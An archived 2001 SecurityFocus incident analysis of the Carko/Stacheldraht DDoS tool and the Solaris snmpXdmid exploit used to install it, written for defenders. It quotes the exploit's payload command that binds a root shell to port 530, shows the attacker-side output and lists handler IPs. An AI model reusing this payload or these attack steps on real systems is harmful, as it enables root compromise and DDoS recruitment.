---------- Forwarded message ---------- Date: Wed, 18 Apr 2001 17:17:40 -0600 From: Ryan Russell <ryanat_private> To: INCIDENTSat_private Subject: Carko/snmpXdmid Analysis v1.0 Carko/Stacheldraht v1.666 + antigl + yps Distributed Denial of Service Tool 4/18/2001 v1.0 The SecurityFocus ARIS Analyst Team wishes to thank Stefan Wagner for his contribution of the s-no binary, Borja Marcos for his contribution of files from a compromised host that had a rootkit installed, Kurt Grutzmacher for the source code to the Solaris x86 8 exploit, and our anonymous contributors. There have been recent reports of an allegedly new Distributed Denial of Service (DDOS) tool being implemented in the wild named "Carko". Upon further analysis of this tool, it has been confirmed that "Carko" is actually a copy of the "Stacheldraht v1.666 + antigl + yps" originally released by Psychoid and Randomizer, January of this year, with some minor modifications. Carko was initially publicized to the Incidents mailing list by an anonymous source. "Stacheldraht v1.666 + antigl + yps" is a variant of the original "Stacheldraht" DDOS tool which was based upon the "Tribal Flood Network" and "trin00" DDOS tools. As many of you may recall, these DDOS tools were attributed in crippling many high-profile e-commerce sites such as Yahoo!, eBay, Amazon, etc. during February of 2000 by overwhelming these servers with enormous amounts of traffic, thus preventing legitimate requests from being fulfilled. Carko is a near replica of Stacheldraht v1.666 + antigl + yps with some very slight variations: 1) Inspection of the binaries reveals that as little as one line of source code differs between Carko and Stacheldraht v1.666 + antigl + yps. Carko contains a different hard-coded IP address, 209.198.242.114, used to test spoofing while Stacheldraht v1.666 + antigl + yps uses the address 3.3.3.3. 2) The Carko executable can be typically found in the directory /usr/share/man/mansps/ddos/carko. 3) It has been reported that a file named td was copied from elsewhere to the compromised host, and given a local name of carko during the rcp process. The td name is the original name for the "client" in Stacheldraht v1.666 + antigl + yps, which carko is a modification of. There are two hard-coded master servers (handlers) in this version of Carko. Master servers are added during the make process. These are: 131.216.135.41, sunset.ccsn.nevada.edu 152.2.21.117, cc-matrix6.oit.unc.edu While Carko is fundamentally just a rehash of a dated yet still effective DDOS tool, attackers are using much more recent exploits in order to leverage Carko/Stacheldraht v1.666 + antigl + yps. Specifically, there have been reported cases of the Solaris snmpXdmid buffer overflow vulnerability being exploited in order to backdoor systems and deploy Carko. The snmpXdmid vulnerability was reported on March 15, 2001 and working exploit is being utilized in the wild. Due to the fact that snmpXdmid is a service initiated by root, any code executed by an unauthorized malicious attacker would be run with superuser privileges. For more information regarding this vulnerability, please see the following database entry: http://www.securityfocus.com/bid/2417 Typically, hosts are initially scanned for the RPC Portmapper (port 111) requesting RPC program number 1000249, version 1, protocol 6 (TCP). This is the snmpXdmid service, usually started via /etc/rc3.d/S77dmi. After verifying that snmpXdmid is indeed running, an attacker may compromise the system via the buffer overflow vulnerability. While the attacker can perform virtually any action they so desire if successful exploitation occurs, many users have reported that a backdoor, and subsequently Carko, have been installed following snmpXdmid exploitation. SnmpXdmid/s-no Exploit Analysis At least one binary copy of the snmpXdmid exploit has been found in the wild. This was discovered on a honeypot host, and was named s-no. It's a Sparc ELF binary, compiled with Sun's WorkShop Compiler 4.2 on a Solaris 2.6 host. The exploit is run from the command-line, and takes a victim IP address, and a victim OS version number as input. The exploit helpfully provides instructions if the parameters are not supplied: # ./s-no snmpXdmisd exploit for solaris SPARC Usage : ./s-no hostname 6|7|8 E.g. $ ./s-no 127.0.0.1 6 (for solaris 2.6) Upon running with the proper parameters, it queries the victim for the vulnerable daemon via portmapper, as noted previously. It then connects to the vulnerable service, and delivers the overflow string. Contained within the string is the set of commands that will be executed on the victim upon successful exploitation: echo courier stream tcp nowait root /bin/sh sh -i > /tmp/.x;/usr/sbin/inetd -s /tmp/.x;rm -f /tmp/.x;nohup /etc/init.d/init.dmi start 1>&2 2>/dev/null &\; The above set of commands creates a root shell on port 530 ("courier" is mapped to 530 in /etc/services), cleans up it's temp file, and restarts the DMI daemon, which had crashed during the overflow. By itself, this is easy to clean up after. Simply stop or upgrade the vulnerable DMI daemon. After the 530 backdoor is connected to once, it does not restart. However, as was previously noted, the attacker usually connects to 530 immediately, and installs additional software, such as Carko. In at least one instance, a full rootkit was installed. Here's what s-no looks like from the attacker's perspective: $ ./s-no 64.81.99.152 6 retaddr = 0xef4a4398 safeaddr = 0xef20b330 clnt_create: RPC: Unknown host $ $ ./s-no 64.81.99.152 7 retaddr = 0xff0369e0 safeaddr = 0xfea0b644 clnt_call[_DmiComponentAdded]: RPC: Timed out Now try to connect the target 530 port, good luck.:) $ $ ./s-no 64.81.99.152 8 retaddr = 0xff0369e0 safeaddr = 0xfea0b644 clnt_call[_DmiComponentAdded]: RPC: Timed out Now try to connect the target 530 port, good luck.:) $ The attack for Solaris 6 has a different set of offsets from 7 and 8, and does not appear to work properly, at least not from our Solaris 7 test platform. The attacks for 7 and 8 execute as expected. The RPC time out message is due to the remote victim service dying following delivery of the exploit. The exploit then goes on to invite the attacker to connect to port 530. The exploit is not successful in every single case, as at least one victim machines we tested didn't execute the commands as expected, though it was vulnerable. The DMI daemon still crashed, however, which blocks further attempts until it is restarted. This particular exploit contains Sparc shellcode, so it won't work on Solaris x86 as-is, but an x86 version should be easy to create, so that is no guarantee of safety. There also exists what is reported to be a Solaris x86 8 exploit. Attached to this note is a packet trace, truss output, and a capture of the TCP data sent, captured by using netcat to listen on a port that portmapper was configured to advertise as the vulnerable service. This is the first version of this analysis. Additional versions will be published soon, containing analysis of a rootkit that was installed in one instance of a snmpxdmid compromise, and analysis of source code to a reported Solaris x86 8 exploit for snmpxdmid, which is different from the once discussed in this document. Resources: "Carko Information" Incidents Mailing List Message http://www.securityfocus.com/archive/75/177265 New Variants of Trinity and Stacheldraht Distributed Denial of Service Tools http://xforce.iss.net/alerts/advise61.php "Trinity v3/ Stacheldraht 1.666" Distributed Denial of Service Tool http://www.nipc.gov/warnings/advisories/2000/00-055.htm The "Stacheldraht" distributed denial of service attack tool http://www.securityfocus.com/library/1999 Distributed Denial of Service Defense Tactics http://www.securityfocus.com/library/1930 Solaris snmpXdmid Buffer Overflow Vulnerability http://www.securityfocus.com/bid/2417
This archive was generated by hypermail 2b30 : Thu Apr 19 2001 - 01:37:15 PDT